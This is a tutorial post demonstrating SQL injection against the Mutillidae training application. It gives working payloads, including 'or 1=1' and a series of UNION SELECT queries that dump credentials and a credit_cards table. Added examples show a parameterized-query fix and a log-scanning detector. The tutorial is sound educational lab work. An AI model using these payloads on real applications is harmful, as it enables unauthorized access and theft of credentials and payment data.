SQL Injection in Mutillidae

Tanvi Trivedi
5 min read · Mar 24, 2021
SQL Injection

What is SQL Injection?

SQL injection is a web security flaw that allows an attacker to interfere with the queries a web application sends to its database. It lets an attacker see data that they would not normally be able to see, which may include data belonging to other users or any other information the application itself can access. In short, SQL injection is the placement of attacker-controlled input into SQL statements via web page input. It is one of the OWASP Top 10 Web Application Security Risks.

What is Mutillidae?

Mutillidae is an OWASP project: a free, open source web application that lets security enthusiasts practise pen-testing and hacking websites. Mutillidae can be installed with XAMPP on Linux, Windows XP, and Windows 7, which makes it simple for users who do not want to set up or manage their own web server.

Starting with Mutillidae SQL Injection.

We won’t be able to cover everything there is to know about SQL injection, because it is such a broad subject, but we will go through some of the basics. For demonstration purposes we will use Metasploitable’s Mutillidae web application, which is vulnerable to SQL injection attacks.

Click on the “Mutillidae” link.

Now go to OWASP 2017 > A1 Injection (SQL) > SQLi - Extract Data > User Info (SQL).

In the Name field, enter a single apostrophe ( ' ).

Click on View Account Details. This causes an error and gives you an output looking like this:

  • Here we can see information about the database the application uses. We can also see the full path of the file that is handling this error.
  • From the message we can see that this is a MySQL database.
  • The SQL query that is used is clearly visible in the error table. To return account info, the query requires both a username and a password.
  • However, since we don’t have a username or password, we can make the statement valid without them by using a comment ( -- ) and the SQL operator OR. We need the query to execute like: SELECT * FROM accounts WHERE username='' OR 1=1 -- password=''

Therefore, the second input to try is → ' or 1=1 -- (followed by a space; MySQL only treats -- as a comment when whitespace follows it)

Click on View Account Details and we can see the result: we got the entire table, which includes the admin username/password as well.

To return the admin account only, enter → admin'#
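As an added illustration (not code from this post or from Mutillidae), the lookup behind the User Info page is shown below twice against a constructed SQLite stand-in for the accounts table: once built by string concatenation, which the apostrophe and the OR 1=1 input above break out of, and once as a parameterized query, where the same input is simply an unknown username.

```python
"""Added example (not the application's own PHP): the User Info lookup
written with string concatenation and with a parameterized query, run
against a constructed in-memory SQLite table."""
import sqlite3


def make_db():
    """Constructed sample accounts table; names and values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (cid INTEGER, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", [
        (1, "admin", "adminpass", 1),
        (2, "alice", "wonderland", 0),
        (3, "bob", "builder", 0),
    ])
    return conn


def lookup_vulnerable(conn, username, password):
    """Builds the WHERE clause from raw input, so a quote or a comment in
    the input changes the structure of the query (the flaw exercised above)."""
    sql = ("SELECT cid, username, is_admin FROM accounts "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username, password):
    """Parameterized query: the driver passes the input as data, never as SQL,
    so the WHERE clause always compares against the literal string supplied."""
    sql = ("SELECT cid, username, is_admin FROM accounts "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "   # the walkthrough's first working input
    print(lookup_vulnerable(db, payload, "x"))  # every account, admin included
    print(lookup_safe(db, payload, "x"))        # [] : no account has that name
```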

Union-based SQL injection

When an application is vulnerable to SQL injection and the results of the query are returned in the application’s responses, the UNION keyword can be used to extract data from other tables within the database. This is known as a SQL injection UNION attack.

When performing an SQL injection UNION attack, there are two effective ways to determine how many columns are being returned from the original query.

Method 1: Injecting a set of ORDER BY clauses and incrementing the specified column index until there is an error.

Method 2: Sending a sequence of UNION SELECT payloads with a varying number of NULL values.

Now enter the query → ' union select null -- - (remember to put a space after the “--”). Click on View Account Details and it will give you the output below:

  • Here we can see an error showing that the query did not use the correct number of columns to line up with the accounts table.

Next, enter in the Name field → ' union select null,null -- -. This gives the same error; we have to keep trying until we get some output.

Finally, we got output using → ' union select null,null,null,null,null,null,null -- -

This does not seem like much at first glance. However, outside of the application’s intended purpose, we have found a possible way to retrieve data from the database.

Enter this query to retrieve the name of the current database:

Query: ' union select null,database(),null,null,null,null,null -- -

Query to gather information about the database version:

Query: ' union select null,@@version,null,null,null,null,null -- -

Query to find out who the current database user is:

Query: ' union select null,user(),null,null,null,null,null -- -

Query: ' union select 1,2,3,4,5,6,7 -- -

The purpose of this UNION statement is to map out which fields on the page correspond to each of the numbers above.

Query: ' union select null,cid,username,is_admin,null,null,null from accounts -- -

We were able to recover all of the database’s usernames and passwords.

Query: ' union select null,table_name,column_name,null,null,null,null from information_schema.columns -- -

Query: ' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards -- - (space after -- -)

Yeayyy, we successfully exploited the bug in the user-info.php script to view credit card information through the accounts query.

Query Through URL

We can also submit SQL queries through the URL. To do so, we place the query in the username and password parameters of the request.

Example:

Now press Enter, and the output is shown here:
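From the defender’s side, an added example (not part of the original post) that parses constructed Apache-style access log lines and flags user-info.php requests whose URL-decoded parameters carry the patterns used in this walkthrough; the log lines, IP addresses and timestamps are made up.

```python
"""Added detection example: flag requests whose decoded query-string values
contain the injection patterns shown in the walkthrough."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log sample (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2021:10:01:02 +0000] "GET /mutillidae/index.php?page=user-info.php&username=alice&password=secret HTTP/1.1" 200 4312
10.0.0.9 - - [24/Mar/2021:10:02:17 +0000] "GET /mutillidae/index.php?page=user-info.php&username=%27+OR+1%3D1+--+&password=x HTTP/1.1" 200 18740
10.0.0.9 - - [24/Mar/2021:10:03:40 +0000] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+select+null%2Cdatabase()%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull+--+&password=x HTTP/1.1" 200 5120
10.0.0.7 - - [24/Mar/2021:10:04:01 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 2210
"""

# One rule per technique in the walkthrough: the OR 1=1 tautology,
# UNION SELECT column probing, and the -- / # comment terminators.
SQLI_PATTERNS = [
    re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"union\s+select\b", re.I),
    re.compile(r"(--\s|#)"),
]

# Minimal common-log-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(text):
    """Return one finding per request whose decoded parameters match a rule.
    parse_qsl undoes the %27 / + encoding, so rules run on what the app saw."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, value in params:
            rules = [p.pattern for p in SQLI_PATTERNS if p.search(value)]
            if rules:
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "value": value, "rules": rules})
                break  # one finding per request is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], repr(f["value"]), f["rules"])
```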

CONCLUSION:

Hence, SQL injection is one of the most common and dangerous attacks that a website’s software can experience. The attack can be used against SQL databases to read and modify their data. This is how we can use SQL injection to gain information.
